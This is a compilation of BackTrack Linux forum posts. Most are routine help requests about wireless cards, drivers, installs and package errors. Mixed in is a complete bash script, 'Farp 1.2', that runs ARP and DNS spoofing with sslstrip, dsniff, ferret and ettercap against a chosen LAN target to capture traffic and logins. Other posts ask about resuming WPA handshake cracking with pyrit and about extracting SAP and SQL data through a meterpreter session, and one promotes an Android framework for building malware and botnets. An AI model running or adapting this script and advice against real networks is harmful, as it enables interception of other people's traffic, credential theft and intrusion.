I've imported a bunch of passwords from a txt file. Now I'm using attack_batch on a handshake file. When I ctrl-c and stop it, then check pyrit eval, it shows my essid has some percentage completed. But when I start up the same command it seems to start from 0% again. But if I ctrl-c again and check pyrit eval it's actually even more completed.
When I start attack_batch multiple times, is it actually continuing to check my particular essid? Because what I'm getting at here and trying to do is a way to continue my attack later when I have to turn the computer off. I figured attack_passthrough would reset from the beginning after I reboot. And what I also want is to see when it finds the password so I can stop it if doesn't do that automatically. I've run the batch command before then attack_db, but this time I want optimum computer usage and calculate the PMKs only up to the point until I get the p/w. Seems like such a waste of time to batch calculate all PMKs when the answer could be near the beginning.
-
Code:
#!/bin/bash
#this is Farp 1.2
#you have to have sslstrip installed
#also this will only work on Backtrack 5 r3 possibly other r's of 5
#you can save this text to a file called farp and chmod +x farp
#please launch with this command for everything to look right (hopefully):
#gnome-terminal --geometry=78x6+620+630 -e /where/you/put/farp
IPNUMF=$(ifconfig | grep Bcast)
IPNUM=${IPNUMF:20:14} ###define the ip address
#echo $IPNUM
DECCOUNT="0"
CHARPLACE="0"
DECPLACE="1"
while [ $DECCOUNT != "3" ] ###define the last decimal place
do
CHARPLACE=$(expr $CHARPLACE + 1)
DECPLACE=$(expr $DECPLACE + 1)
IPCHAR=${IPNUM:$CHARPLACE:1} ###this is the char by char scan code
if [ $IPCHAR = "." ] ###define the decimal places
then
DECCOUNT=$(expr $DECCOUNT + 1)
fi
done
ENET=${IPNUM:0:$DECPLACE} ###define the numbers up to the last decimal
#echo "your network is: $ENET"
NODENUM=${IPNUM:$CHARPLACE:3} ###define the numbers after last decimal
#echo "your node is: $NODENUM"
#NICF=$(/pentest/sniffers/intercepter-ng/intercepter_linux -h | grep "IP2" -B 2)
#echo $NICF
#NIC=${NICF:0:6}
NICF=$(ifconfig | grep Bcast -B 1) ###define the connected interface
NIC=${NICF:0:8}
#echo $NIC
AROUTR=$(route -n | grep $NIC)
NODER=$(expr $DECPLACE + 3)
ROUTRF=${AROUTR:16:$NODER}
ROUTR=${ROUTRF:$DECPLACE:3}
ROUTR=$(expr $ROUTR + 1)
ROUTR=$(expr $ROUTR - 1)
ROUTR=$ENET$ROUTR ###define the router ip
INTRCF=$(/pentest/sniffers/intercepter-ng/intercepter_linux -h | grep "IP2" -B 3)
INTRC=${INTRCF:10:2} ###define intercepter interface number
trap trapeze 2
displayr (){
clear
echo """
###############################
# Farp V 1.2 #
# Ultra fast ARP & DNS Spoofer #
# by BadAcid #
############################### """
#if [ $SSLDO = "y" ]
# then
xterm -geometry 71x05+600+400 -e "sslstrip -f -k" &
#fi
xterm -geometry 100x3+0+640 -e "arpspoof -i $NIC -t $TARG $ROUTR" &
xterm -geometry 100x3+0+700 -e "arpspoof -i $NIC -t $ROUTR $TARG" &
xterm -geometry 50x5+600+500 -e "dsniff -i $NIC" &
xterm -geometry 220x21+0+320 -e "/pentest/sniffers/hamster/ferret -i $NIC" &
gnome-terminal --geometry 190x18+0+0 -e "/pentest/sniffers/intercepter-ng/intercepter_linux $INTRC 3" &
sleep 2
clear
}
dnsspoofr (){
echo "[*] DNS SPOOFING TIME £-P"
read -p " [>] TARGET IP/RANGE: $ENET" TARGR
TARG=$ENET$TARGR
ettercap -T -q -i $NIC -P dns_spoof -M arp /$ROUTR/ /$TARG/
}
trapeze (){ ###exit function
clear
xterm -geometry 100x3+0+640 -e "arpspoof -i $NIC -t 0.0.0.0 $TARG" &
xterm -geometry 100x3+0+700 -e "arpspoof -i $NIC -t 0.0.0.0 $ROUTR" &
sleep 0.5
killall dsniff
killall urlsnarf
killall arpspoof
killall sslstrip
killall ferret
killall intercepter_linux
echo 0 > /proc/sys/net/ipv4/ip_forward
clear
echo """
###############################
# Farp V 1.2 #
# Ultra fast ARP & DNS Spoofer #
# by BadAcid #
#####[*] Reseting ARP tables... """
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
sleep 3
clear
echo "[*] ARP tables restored"
echo "[*] All systems have been shut down."
echo "[*] Press Alt+f4 to clear windows, Goodbye!"
}
echo 1 > /proc/sys/net/ipv4/ip_forward
# iptables --flush
# iptables --table nat --flush
# iptables --delete-chain
# iptables -P FORWARD ACCEPT
# iptables --table nat --delete-chain
# iptables -t nat -A POSTROUTING -o $NIC -j MASQUERADE
# echo "[*] IP forwarding enabled"
#read -p " [>] Do you want to enable sslsrtip [Y/n]: " SSLSTP
#if [ $SSLSTP = "n" ]
#then
#SSLDO="n"
#else
SSLDO="y"
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables -P FORWARD ACCEPT
iptables --table nat --delete-chain
iptables -t nat -A POSTROUTING -o $NIC -j MASQUERADE
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
# echo "[*] Sslstrip ready..."
# fi
echo
read -p " [>] TARGET IP: $ENET" TARGR #### <<user input needed to attack
TARG=$ENET$TARGR
#ping -c 1 $TARG
clear
displayr
while [ true ]
do
MOR="y"
if [ $MOR = "y" ]
then
echo " [>] press CTRL+C to exit"
echo ' [>] press "d" and then ENTER for DNS spoofing'
echo ' [>] press "k" and then ENTER to restore ARP tables'
read -p " [>] TARGET IP: $ENET" TARGF #### <<user input needed to attack
if [ $TARGF -z ]
then
clear
break
elif [ $TARGF = "k" ]
then
clear
echo "[*] Reseting ARP tables..."
killall arpspoof
sleep 3
clear
echo "[*] ARP tables restored"
elif [ $TARGF = "d" ]
then
clear
dnsspoofr
END="1"
break
#dnsspoof -f /root/dnsspoof host $TARG1 and udp port 53
elif [ $TARGF = "D" ]
then
clear
dnsspoofr
END="1"
break
#ettercap -T -q -i $NIC -P dns_spoof -M arp /$TARG1/ /$ROUTR/
#dnsspoof -f /root/dnsspoof host $TARG1 and udp port 53
else
clear
TARG=$ENET$TARGF
echo
echo
clear
xterm -geometry 100x3+0+640 -e "arpspoof -i $NIC -t $ROUTR $TARG" &
xterm -geometry 100x3+0+700 -e "arpspoof -i $NIC -t $TARG $ROUTR" &
echo "[*] ATTACKING $TARG"
fi
fi
done
if [ $END != "1" ]
then
trapeze
fi
-
Not using a proxy and running apt-get update shows a bunch of repositories being checked then just after:
Get:11
http://us.archive.ubuntu.com lucid-updates/universe Packages [287kB]
99% [8 packages bzip2 0B]
and no progress beyond that.
What's up with this? How can I update?
Thanks.
-
Hello all
i'm really new to this, but i think this could help the community out there.
there's a tool for windows called DEEP FREEZE that once installed it runs the OS in ram so that none of the changes are kept after the machine reboots.
this can be useful since it makes the OS malware proof. although there are ways to bypass this with physical access methods, it makes it extremely unlikely that the OS will owned remotely. if it does, you just reboot your machine and that's it. that way you get rid of the threat of keyloggers and such, keeping your clients pen-testing data safe.
the use of full disk encryption can make this method even safer (since you can't tamper with the OS with a live disk unless you have the password) --
i've managed to install backtrack natively with Full Disk Encryption using this guide:
https://netsecuritystuff.wordpress.c...ion-with-luks/
so the tools that accomplish this are LETHE and FSPROTECT
however the both use "aufs-modules" which I think is not included in backtrack.
i found this guide:
http://technozorgs.blogspot.com/2012...ze-30-and.html
but it looks daunting at least for a linux noob like me
has anybody installed 'aufs-modules' successfully in backtrack?
-
Hello guys, I'm new to the community, and I'm eager to learn somethings about BT and the pentest scene.
I've got a Laptop with a Intel 5100 wireless card, and after a lot of failed tries, I've decided that I really need a USB wireless adapter, with the bonus of being able to use BT in VMWare.
Now, the question:
I've read a lot about the Alphas, and saw that there are some card's from dealextreme that are supposed clones, and are compatible with BT5.
I've yet to decide about which model to choose from:
1 - The 802.11g 54Mbps High Power 1000mW USB 2.0 WiFi Wireless Network Dongle, with the Dragon printed in the card (Bonus cool factor :P)
http://dx.com/p/802-11g-54mbps-high-...k-dongle-35688
This card has good reviews in the BT foruns and the dealextreme page, but are kinda old. Am I missing something here? Is this card no longer used?
2 - the2000mW High Power 802.11b/g/n 150Mbps USB 2.0 Wireless Network Dongle with Dual Antenna
http://dx.com/p/2000mw-high-power-80...-antenna-44929
This card has a great review in the foruns, by citruspears, dated from end 2010:
http://www.backtrack-linux.org/forum...ad.php?t=33740
Again, last reviews are kinda old.
So, is there a real difference in the cards? Is one better than the other? Is there a new kinda clone card in the market that I haven't seen yet?
Thank you in advance for the time to read my post.
TL,DR:
Which is better
http://dx.com/p/802-11g-54mbps-high-...k-dongle-35688 or
http://dx.com/p/2000mw-high-power-80...-antenna-44929
-
pardon for my English I am Spanish
double band wanted to buy to me these days card tp-link tl-wdn3200
with program comview they put it very well to audit
with backtrark and other linux I did not find anything
some of you uses it or knows if they work well?
-
-
Please Help!
I have scanned the internet looking for a fix for this issue, I know that there is a lot out there about this and have possibly tried them all but they haven't worked for me!
I have a nVidia Quadro NVS285 card, I finally downloaded the driver into my root directory, when I run sh NVIDIA.... (blah) command I get the driver installation screen, I accept the terms, then I get a message advising that the Nouveau driver needs to be disabled??
It states that the conf file to disable the Nouveau file exists but the driver is still running?
Any idea's?
Kernel 3.2.6, Ubuntu 10.4 LTS Lucid, BT5 R3 Gnome 32 bit.
Thanks in advance. :)
-
I've been searching the internet for the answer to my question for two days now. Maybe I'm missing something simple but regardless here goes.
I have successfully installed and ran the karma'd hostapd on my bt5 laptop. From
http://www.digininja.org/karma/ and I've successfully connected to it and got an IP address. The problem I am having is what to do after that. I tried monitoring any interface that was related to the ap but all I can get are beacon frames. What can you do once you get connections with this?
If this question was answered I apologize for being a dumb ass.
Thanks for listening.
Tymm
-
Hi, I've been having problems with WICD. It randomly disconnects and doesn't auto-reconnect even though I have auto-reconnect enabled:
wicd.png
I was wondering how to fix this. I use BT5R3 32bit KDE. I would put the log up, but I can't find it.
Thanks in advance!
-Bf109guy
Immagini allegate
-
I had Windows 7 on my laptop and I wanted to do a duel boot with BT5R3/W7, but I some how messed up. On the start up it will show
-----------------------------------------------------
Ubuntu, with Linux 3.2.6 |
Ubuntu (recovery mode ) |
Memory test (memtest86+) |
Memory test (memtest86+, serial console 115200) |
Windows 7 (loader) (on /dev/sda1) |
Windows Vista (loader) (on /dev/sda2) |
-----------------------------------------------------
From memory, when I partitioned the Hard Drive I chose these options:
SDK1 (Do not partition option) 100 MB
SDK2 (Do not partition option ) /Windows7 150000 MB
SDK 5 Ext4 option / 160000 MB
SDK 6 swap option 5000 MB
*Then I clicked Forward
On the advanced option before installing, I changed boot loader to be SDK1 instead of SDK which is was already set to.
Now when I try to start up Windows 7, it tells me that a device has been removed and I need to put the system recovery CD in. I made a backup of all my files prior to doing this. However, the CDs I made for recovery is not what the system is telling me to insert. The lap top did not come with a Windows 7 system recovery CD, so I do not know what I should do.
What did I do to my system?
Is there a way to get back my Windows 7?
If not, could someone tell me what I did wrong so I can learn from my mistake?
-
Hi,
using arpspoof on virtualbox (BT5r3 over osx 10.8.2) i got a strange problem: if i try to poison a single client A, from a client B, wireshark doesn't show me any arp packet. (why?)
If i try to poison in broadcast: wireshark, on the client A, shows me the right arp packets and the arp table of the client A it's filled correctly with the client B mac address linked to the gateway IP.
The point is: i'm trying to ping the gateway from client A, wireshark (on client A too) shows me icmp packets but the mac address is of the "original" gateway and not of the client B. The arp table of the client A is still filled rightly.
Some suggestion?
Thanks
-
hello, I am running backtrack5r3 on VMware. The wireless card has been working fine up to now on it. But, as of today, when I open my wireless network manager, it detects no wireless networks. I have used it in the past few days without any problems and i haven't changed any settings or anything that would of changed this.
I tried
root@evilbox:~# dpkg-reconfigure wicd
root@evilbox:~# update-rc.d wicd defaults
But, even though this stopped the error coming up when starting my wireless network manager, i am still unable to detect any.
Any help would be appreciated
Elliott
-
Hello everybody i have the problem i using Backtrack 5 r3 gnome version in HDD
first i use this comand to start the card reader
Code:
pcscd -f -d and have this
00000000 debuglog.c:224:DebugLogSetLevel() debug level=debug
00000814 pcscdaemon.c:505:main() pcsc-lite 1.5.3 daemon ready.
00222077 hotplug_libusb.c:477:HPAddHotPluggable() Adding USB device: 003:002
00000067 readerfactory.c:1024:RFInitializeReader() Attempting startup of ACS ACR122U PICC Interface 00 00 using /usr/lib/pcsc/drivers/ifd-ccid.bundle/Contents/Linux/libccid.so
00000289 readerfactory.c:877:RFBindFunctions() Loading IFD Handler 3.0
00000069 ifdhandler.c:1532:init_driver() Driver version: 1.3.11
00000837 ifdhandler.c:1545:init_driver() LogLevel: 0x0003
00000685 ifdhandler.c:1565:init_driver() DriverOptions: 0x0005
00000019 ifdhandler.c:82:IFDHCreateChannelByName() lun: 0, device: usb:072f/2200:libusb:003:002
00001312 ccid_usb.c:285:OpenUSBByName() Manufacturer: Ludovic Rousseau (ludovic.rousseau@free.fr)
00000686 ccid_usb.c:295:OpenUSBByName() ProductString: Generic CCID driver
00000671 ccid_usb.c:301:OpenUSBByName() Copyright: This driver is protected by terms of the GNU Lesser General Public License version 2.1, or (at your option) any later version.
00063835 ccid_usb.c:501:OpenUSBByName() Found Vendor/Product: 072F/2200 (ACS ACR122U PICC Interface)
00000035 ccid_usb.c:503:OpenUSBByName() Using USB bus/device: 003/002
00000016 ccid_usb.c:852:ccid_check_firmware() Firmware (1.03) is bogus! but you choosed to use it
00001112 ccid_usb.c:893:get_data_rates() IFD does not support GET_DATA_RATES request: Success
00013963 ifdhandler.c:364:IFDHGetCapabilities() tag: 0xFB0, usb:072f/2200:libusb:003:002 (lun: 0)
00000114 readerfactory.c:249:RFAddReader() Using the pcscd polling thread
00003992 ifdhandler.c:364:IFDHGetCapabilities() tag: 0xFAE, usb:072f/2200:libusb:003:002 (lun: 0)
00000034 ifdhandler.c:418:IFDHGetCapabilities() Reader supports 1 slot(s)
00000038 hotplug_libusb.c:403:HPEstablishUSBNotifications() Driver ifd-ccid.bundle does not support IFD_GENERATE_HOTPLUG. Using active polling instead.
00000014 hotplug_libusb.c:412:HPEstablishUSBNotifications() Polling forced every 1 second(s)
00007813 ifdhandler.c:1043:IFDHPowerICC() action: PowerUp, usb:072f/2200:libusb:003:002 (lun: 0)
00054080 Card ATR: 3B BE 95 00 00 41 03 00 00 00 00 00 00 00 00 00 02 90 00
when i use the nfc-list have this
Code:
nfc-list use libnfc 1.4.2 (r891)
Connected to NFC device: ACS ACR122U PICC Interface 00 00 / ACR122U103 - PN532 v1.6 (0x07)
Code:
when i run the mfoc -P 500 -O card_dump say this
nfc_initiator_select_passive_target: Success
how i fix the problem
i use the backtrack wiki to install
my card reader is touchatag starter kit
sorry i find the problem is i not testing with with smart card
the post can be close
sorry people
-
With BT5r3
Noticed I was only getting broadcast traffic sniffing.
Yesterday I updated to the latest firmware from Intel, not sure if that changed anything.
If I do
# iwconfig wlan0 mode monitor channel 149
# airodump-ng wlan0 -c 149 -w test
, with an 802.11a client, everything works.
If I do
# iwconfig wlan0 mode monitor channel 6
# airodump-ng wlan0 -c 6 -w test
, with an 802.11n client on 2.4 GHz, I only see broadcasts.
Seems pretty repeatable.
Tried using airmon-ng, the mon0 interface it creates, etc., no change.
Also, the monitor mode checkbox in Wireshark is grayed out, but that may be a different problem, since iwconfig does say that the interfaces are in monitor mode.
-
-
Dear all,
I've got some problems with arpspoofing,
Situation.
Host Machine MACbook , guest backtrack 5r3.
Connected via bridge , while i try to arpspoof a host machine thats connected to the same network.. The internet dies on the spoofed machine!
I'm using VM fusion to run backtrack!
What do you think is causing the problem? It's been a hustle, ive been trying to fix it for a month now!
Whenever i try to arpspoof a victim, the internet goes dead! on the victim!
-
Hi,
I need to install Nexpose community edition in BT5 R3.
Presently using BT5 R3 in vmware workstation9. Assigned 6 GB of Ram to VM Machine but 32 bit of BT5 Gnome only shows up around 3GB Ram.
To overcome this followed the linked
http://www.backtrack-linux.org/wiki/...php/PAE_kernel
and checked cat/proc/meminfo and it only shows around 3GB of RAM stilll.So is Nexpose gives the error of less memory.
I can check under /usr/src/linux# make menuconfig maximum memory being set afteer reboot is 64GB.
Is there any possibilty if this can be resolved or something I am missing?
Regards,
Sushil
-
Hello friends
I tried metagoofil on some domain and i always got similar messages
1. error downloading files.
2. tuples out of range
Any help
Thanks
-
Hello. I'm still a newbie, but I've done some research and couldn't find anyone with my problem.
Basically, when I run airodump-ng I can find about 30 AP's, but no stations.
Sometimes a not associated station appears, but it goes away pretty quickly.
Does this mean nobody's using wifi? Help...
btw I'm using an Atheros AR9287 device.
-
I had installed BT5r3 on a new box and noticed once I had installed Compiz for the eye candy, there was something constantly writing to disk (icon was flashing frequently) and my cpu/discreet graphics would increase over time (nothing too crazy, but was enough to question, since I was not doing anything intensive on the machine at the time).
Apparently there is a conflict with Compiz and Metacity. Since I do not use Metacity, my workaround was leaving the metacity-common package (i didn't look too deep, but it seems like it is depended on by many other apps installed) but simply removing the metacity package itself (which contains the binaries). Immediately upon removal the constant disk writing went down, and the tied process associated with it (gconfd-2) lowered cpu use.
If anyone else experiences this issue, try the method outlined above > remove metacity. Let me know if it works for you as well!
-
it's already downloaded but i got a problem with the 4e step of the installation of backtrack
print screen with the problem :
Screenshot.jpg
i hope for some response ;)
Immagini allegate
-
Hello,
I am pentesting a local windows 2003 server running SAP and MsSQL.
I have managed to get a meterpreter session opened on it.
My intention are to get the SAP and SQL data.
Only problem is I know nothing about SQL or SAP.
I have read up on the SAP and SQL modules in metasploit.
However I dont see much on what I am trying to do.
With meterpreter I have downloaded SQL LDF files.
I am currently reading up on how to open and read them.
Correct me if I am wrong bu I am now under the understanding that LDF files contain none of the actual data I am looking for.
Instead they are just log files..?.?
If anyone has had experience with this I would appreciate any input.
I tried using SQL map.
I simply tried to point it to the local IP of the server but it returned finding no SQL information.
Does anyone know of any tutorials?
Can anyone help me with my journey?
-
Hi, Look I don't know much/anything about wifi. But I was just thinking about something.
If I am on backtrack and create a fake AP with my routers mac address, same BSSID and a random wpa password.
Would there be a way to recover the key if my other PC connects to my fake AP, instead of my router?
Is there anything that can happen or am I just stupid.
-
Hi there,
I'm very new to BackTrack. Downloaded it yesterday and am running it through Virtual Box. I'm trying to work out how to install WINE Version 1.4 as I'm trying to install Registax 6 and need an updated version of WINE than that already on the system.
Is anyone able to help?
Thanks.
-
-
I have a SSH server hosted on my desktop in BackTrack 5 r3 64-bit. I m able to access the ssh sever from the LAN using my laptop but when I try to access my ssh server from my office using the public IP it doesn't work. The connection just pauses with no response.
Command: ssh -v xxx.xxx.xxx.xxx -p22
What all I have tried so far:
1. Port forwarding in the router for Port 22.
2. Allowed port 22 in iptables.
3. Nmap result on private ip shows port 22 open and for public ip it says port 22 filtered.
4. ssh-keygen to generate the keys. I had also used sshd-generate before but now when I try to do sshd-generate I get "sshd-generate: command not found"
If I stop the sshd and open netcat using "netcat -lvp 22" then using "http://www.ping.eu/port-chk/" to check the status of port 22 I get the incoming packet detail in netcat output. But when i start sshd on port 22 and try to login using public ip from my office computer I cannot connect to my ssh server computer.
Keeping the sshd service running and then trying to check for port 22 status using the above mentioned website I get port open. But still I cannot connect to the ssh sever using my public IP.
-
Ok, so I want to dual boot windows 8 on an ssd (already setup) and install BT5r3 on a separate hard drive in the computer. This is becuase I really don't want to go to the pain of reinstalling everything. Any ideas?
-
Hi guys,
I am new to this obviously, and I have an question that I was hoping that someone may possibly have some time to help me with.
I have an Alienware M17x R4 Laptop with an Intel(R) Centrino(R) Wireless-N 2230 wireless card. I have been searching and searching the last 2 weeks trying to figure out how in the world to get Linux to recognize my Driver, so I can access Wireless internet. I understand that from a noob's standpoint this is not where I should necessarily be starting but I am kind of stuck.
I am running BackTrack 5 r3 and I would love to know if someone could possibly walk me through the steps (specified to my system (if possible)) on how to set that up. Please, any help would be IMMENSELY appreciated.
Gary
-
I am new to BT5 and somewhat new to linux. I am taking a cyber security class for college and need my Netgear N300 (WNA3100) network adaptor to work in BT5. I am running Linux Mint 14 on my laptop, and using a virtual maching to run BT5. I am not sure if it is a driver issue or if I am missing something. When I open a terminal and type "airmon-ng" I get:
Interface Chipset Driver
there is nothing populated under these... can anyone help? I am going to need easy step by step directions.
Thanks in advance!
-Linuxnoob12
-
Hi.
I got the usb adapter ALFA AWUS036NH. I am totally newbie in Backtrack 5. My issue is, I cant get the card to work properly. Not when
I boot live CD, not when I install Backtrack to my system and not when i boot with VM player. I tried to use Backtrack witk my wireless card Broadcom, as well. But the same thing, it doesnt work like it should. I can surf the web with Broadcom, though.
Do I need ALFA AWUS036N instead?
I have also tried to use it with Backtrack 5r3 in VM player, but NOPE. I first ordered ALFA AWUS036NHR, then AWUS036NH and now I am considering to send this one back to and order AWUS036N. '
Now, if you are a high tech pro in Backtrack but a arrogant dude as well, leave me alone.
But other than that, all help is much appreciated. I am fresh and don`t even know what "sniffing" means.:(
Best regards
Ireal
-
Is there a way to install BackTrack to a hard disk using logical volume manager? For Ubuntu you need the alternate install CD, but is there such a thinkg for BackTrack?
Regards,
Tony.
-
Hey
I have been looking at google for days trying to find a solution to my problem but no luck yet, so i hope i could find some help here :)
OK, here's the problem my new Netgear wna1100 n150 networks adaptor is not showing anything when i use the command airmon-ng it just comes out blank.
Sometimes Wicd network manager is conneted to 192.168.1.12 but i have no internet connection
When i use command
iwconfig:
lo no wireless extensions
eth0 no wireless extensions
lsusb:
Bus 001 device 003: ID 0846:9030 NetGear, Inc. WNA1100 wireless-N 150 [atheros AR9271]
Bus 001 device 002: ID 80ee:0021 virtualbox USB Tablet
Bus 001 device 001: ID 1d6b:0001 linux foundation 1.1 root hub
ifconfig:
eth0 Link encap:ethernet HWaddr 08:00:27:0c:f4:4e
inet addr:192.168.1.12 Bcast:192.168.1.255 Mask:255.255.255.0
inet6 addr: fe80: :a00:27ff:fe0c:f44e/64 scope:link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:168 errors:0 dropped:0 overruns:0 fram:0
TX packets:189 errors:0 dropped:0 overruns:0 drame:0
collisions:o txqeuelen:1000
RX Bytes :15734 (15.7) tx bytes:27046 (27.0kb)
lo Link encap:local Loopback
inet addr:127.0.0.1 Mask 255.0.0.0
inet6 addr: ::1/128 scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:170 errors:0 dropped:0 overruns:0 frame:0
TX packets:170 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:13258 (13.2kb) TX bytes:13258 (13.2 kb)
Is there anything else you need to know from me, let me know cus i would really like to get it up and running
-
-
Hi ,
i want to to install backtrack 5 on my laptop which is "hp pavilion g4-2082la" but when ever i tried to boot my laptop with bootable flash drive it shows black screen.
I make my drive bootable using UNetbootin.
please suggest me what is the problem, Backtrack is tested on VM i.e copy is not corrupted.
i been doing some searching over the internet and found out another solution that is , install Ubantu and then Install Backtrack over it , any risks involved in that?
Details :
Version - BT5
manager - GNOME
Arch -64
tested on another machine ASUS X52F-XF1 Working Fine
-
Hi everyone.
Firstly clearly I'm a newbie with everything security related, and I figure I'll be straight with you all as to what I'm looking into rather than shitty euphemisms like "I forgot my Facebook password can someone hack it for me lolz". If the answer is no that's fine I'm just curious.
Looking into pen testing has been amazing for me. I'm finding it so interesting and reading a ton of books, watching a ton of videos and spending weeks on testing out different things in a pen lab. To me it's almost like waking up and looking at the internet in a new way, something extremely cool. My biggest urge now though is to try and find out how secure lots of different places are, and what "real world" security is like. It seems in a pen lab there is always a vulnerability, always a known result, and almost like a forgone conclusion. It seems so exciting to spot something "in the wild". Writing it down it sounds so geeky but hey, you guys probably understand.
Saying all that, I am genuinely not in it to damage something that isn't mine or have any malicious motivations at all, only my curiosity. My question then becomes - is there any way to explore a server in the real world, detecting vulnerabilities and finding out what could be done, but maintaining legality because you never actually exploit he system? If anything you could possibly notify the owners of the vulnerability. I'm thinking the answer will be no, but your advice is appreciated.
Cheers.
-
So I haven't posted anything useful on here in a while. I still read the threads though on a weekly, if not daily basis, however. It never fails to see so many ridiculous threads on here these days.
I propose that on the next major update to Back|Track; that the Install GUI is removed and we go back to the old r3 days when if a user wanted to install Back|Track, they actually had to learn a little bit of linux prior to doing so.
Offer the Install GUI .deb for like $10, and the Back|Track devs would be rich beyond belief.
I think this would also kill off some of the idiot posts ya get on here..
Just my 2 cents.
--Snafu
-
Is there a boot parameter or other method to force the LiveCD to require a password to login to a virtual console on the local machine?
-
Hello Guys,
I have developed a framework for Android apps and platform security evaluation and exploitation.
The framework is named as
Android Framework for Exploitation or
AFE.
Using it, you could find
vulnerabilities in applications such as Leaking Content Providers, Insecure File Storage, Directory Traversal and many more.
You could also use it to create
automated malwares and botnets for Android Platform for your analysis, which you could even use to check the effeciency of your Antivirus.
The framework is written in complete
Python, and is extendible. So, you could add your modules, or port any existing tools, and integrate with AFE.
For any bugs/issues, you could post on the
Github page or comment below here.
Github Link
-
Hello,
I'm new here, I've just downloaded BackTrack 5 R3, Desktop: GNOME, Architecture: 32, Image: ISO, After that I have downloaded and installed VMware Player then I have created a new virtual machine and I have followed the steps after the boot of backtrack I choosed "Backtrack Text - defaut boot text mode" then a black screen show up contains "Casper +........................ready" after 5 secondes a screen show up with hundred errores.. please see this image:
My PC hardware configuration:
System:
---------------
Operating System: Windows 7 Professionnel 32-bit (6.1, Build 7600) (7600.win7_rtm.090713-1255)
Language: French (Regional Setting: French)
System Manufacturer: FUJITSU SIEMENS
System Model: D1837
BIOS: Version 5.00 R1.11.1837
Processor: Intel(R) Celeron(R) CPU 3.06GHz, ~3.1GHz
Memory: 1024MB RAM
Available OS Memory: 1014MB RAM
DirectX Version: DirectX 11
User DPI Setting: Using System DPI
System DPI Setting: 96 DPI (100 percent)
Display Devices:
---------------
Card name: Intel(R) 82915G/GV/910GL Express Chipset Family
Manufacturer: Intel Corporation
Chip type: Intel(R) 82915G/GV/910GL Express Chipset
Display Memory: 122.0 MB
Current Mode: 1152 x 864 (32 bit) (60Hz)
Sound Devices
-------------
Description: Haut-parleurs (SoundMAX Integrated Digital Audio)
Also I have tried that on VirtualBox software but the same problem
I would appreciate it if you can help me with this problem
Thank you!
-
-
hi im running back track 5r3 32bit gnome on virtual box it all runs but when i click on install back track it goes to step 7 then when on bout 32percent it comes up with this error....
errno5 input output error
this is oftern due to a faulty cd/dvd disk or drive, or a faulty hard disk. it may help to clean cd/dvd, to burn the cd/dvd at a lower speedm to clean the cd.dvd drive lens, to check weather the hard disk is old and in need of replacement, or to move the system to cooler place....
iv tryed so many things and i cant solve it im running windows 7, 500gb hard drive and 4gb ram its cool as well. please help
-
Rumor has it back|track is dying. I've been using back|track since 2006; I sure hope this project isn't dead.
Happy hacking everyone!
-
while installing yum i got this errors
its a fresh installation nothing changed
help ??????????????/
root@bt:~# apt-get install yum
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following packages were automatically installed and are no longer required:
libdmraid1.0.0.rc16 python-pyicu libdebian-installer4 cryptsetup libecryptfs0 reiserfsprogs rdate bogl-bterm ecryptfs-utils libdebconfclient0 dmraid
Use 'apt-get autoremove' to remove them.
The following extra packages will be installed:
librpmbuild0 python-rpm python-sqlite python-sqlitecachec python-urlgrabber rpm rpm2cpio
Suggested packages:
python-sqlite-dbg alien elfutils rpm-i18n
The following NEW packages will be installed:
librpmbuild0 python-rpm python-sqlite python-sqlitecachec python-urlgrabber rpm rpm2cpio yum
0 upgraded, 8 newly installed, 0 to remove and 0 not upgraded.
Need to get 3,605kB of archives.
After this operation, 6,726kB of additional disk space will be used.
Do you want to continue [Y/n]? y
WARNING: The following packages cannot be authenticated!
librpmbuild0 python-sqlite python-urlgrabber rpm2cpio rpm python-rpm python-sqlitecachec yum
Install these packages without verification [y/N]? y
Err
http://32.repository.backtrack-linux.org/ revolution/main librpmbuild0 4.7.2-1lbuild1
Something wicked happened resolving '32.repository.backtrack-linux.org:http' (-5 - No address associated with hostname)
Err
http://updates.repository.backtrack-linux.org/ revolution/main librpmbuild0 4.7.2-1lbuild1
Something wicked happened resolving 'updates.repository.backtrack-linux.org:http' (-5 - No address associated with hostname)
Err
http://updates.repository.backtrack-linux.org/ revolution/main python-urlgrabber 3.1.0-5ubuntu1
Something wicked happened resolving 'updates.repository.backtrack-linux.org:http' (-5 - No address associated with hostname)
Err
http://updates.repository.backtrack-linux.org/ revolution/main yum 3.2.25-1ubuntu2
Something wicked happened resolving 'updates.repository.backtrack-linux.org:http' (-5 - No address associated with hostname)
Err
http://updates.repository.backtrack-linux.org/ revolution/main python-sqlite 1.0.1-7ubuntu1
Something wicked happened resolving 'updates.repository.backtrack-linux.org:http' (-5 - No address associated with hostname)
Err
http://updates.repository.backtrack-linux.org/ revolution/main rpm2cpio 4.7.2-1lbuild1
Something wicked happened resolving 'updates.repository.backtrack-linux.org:http' (-5 - No address associated with hostname)
Err
http://updates.repository.backtrack-linux.org/ revolution/main rpm 4.7.2-1lbuild1
Something wicked happened resolving 'updates.repository.backtrack-linux.org:http' (-5 - No address associated with hostname)
Err
http://updates.repository.backtrack-linux.org/ revolution/main python-rpm 4.7.2-1lbuild1
Something wicked happened resolving 'updates.repository.backtrack-linux.org:http' (-5 - No address associated with hostname)
Err
http://updates.repository.backtrack-linux.org/ revolution/main python-sqlitecachec 1.1.2-1ubuntu1
Something wicked happened resolving 'updates.repository.backtrack-linux.org:http' (-5 - No address associated with hostname)
Failed to fetch
http://updates.repository.backtrack-...uild1_i386.deb Something wicked happened resolving 'updates.repository.backtrack-linux.org:http' (-5 - No address associated with hostname)
Failed to fetch
http://updates.repository.backtrack-...untu1_i386.deb Something wicked happened resolving 'updates.repository.backtrack-linux.org:http' (-5 - No address associated with hostname)
Failed to fetch
http://updates.repository.backtrack-...buntu1_all.deb Something wicked happened resolving 'updates.repository.backtrack-linux.org:http' (-5 - No address associated with hostname)
Failed to fetch
http://updates.repository.backtrack-...uild1_i386.deb Something wicked happened resolving 'updates.repository.backtrack-linux.org:http' (-5 - No address associated with hostname)
Failed to fetch
http://updates.repository.backtrack-...uild1_i386.deb Something wicked happened resolving 'updates.repository.backtrack-linux.org:http' (-5 - No address associated with hostname)
Failed to fetch
